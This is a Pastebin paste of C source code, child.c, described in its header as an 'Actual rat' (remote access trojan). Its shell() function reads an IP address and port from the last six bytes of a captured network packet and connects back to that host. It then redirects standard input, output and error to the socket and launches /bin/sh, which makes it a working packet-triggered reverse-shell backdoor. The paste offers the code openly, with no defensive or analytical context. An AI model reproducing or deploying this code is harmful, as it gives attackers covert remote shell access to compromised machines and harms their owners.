Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * child.c
- * Actual rat
- * By J. Stuart McMurray
- * Created 20160319
- * Last Modified 20160319
- */
- #include "plainshell.h"
- /* shell calls back the address specified in the last six bytes of pkt, which
- * is of length len. */
- void shell(const u_char *pkt, bpf_u_int32 len) {
- struct sockaddr_in sa; /* Address */
- int s; /* Socket */
- int i;
- /* If we don't have at least 6 bytes of packet, :( */
- if (6 > len) {
- errx(8, "Packet too small");
- }
- /* Wait before calling back */
- sleep(WAITTM);
- /* Work out the address */
- sa.sin_family = AF_INET;
- memcpy(&(sa.sin_port), pkt+len-2, sizeof(sa.sin_port));
- memcpy(&(sa.sin_addr.s_addr), pkt+len-6, sizeof(sa.sin_addr.s_addr));
- bzero(sa.sin_zero, sizeof(sa.sin_zero));
- /* Make a socket */
- if (-1 == (s = socket(AF_INET, SOCK_STREAM, 0))) {
- err(7, "socket");
- }
- /* Connect to the remote host */
- if (-1 == connect(s, (struct sockaddr *)&sa, sizeof(sa))) {
- err(9, "connect");
- }
- /* Replace file descriptors */
- for (i = 0; i < 3; ++i) {
- if (-1 == (dup2(s, i))) {
- err(10, "dup2");
- }
- }
- /* Exec a shell */
- if (-1 == execl("/bin/sh", SHNAME, NULL)) {
- err(11, "execl");
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
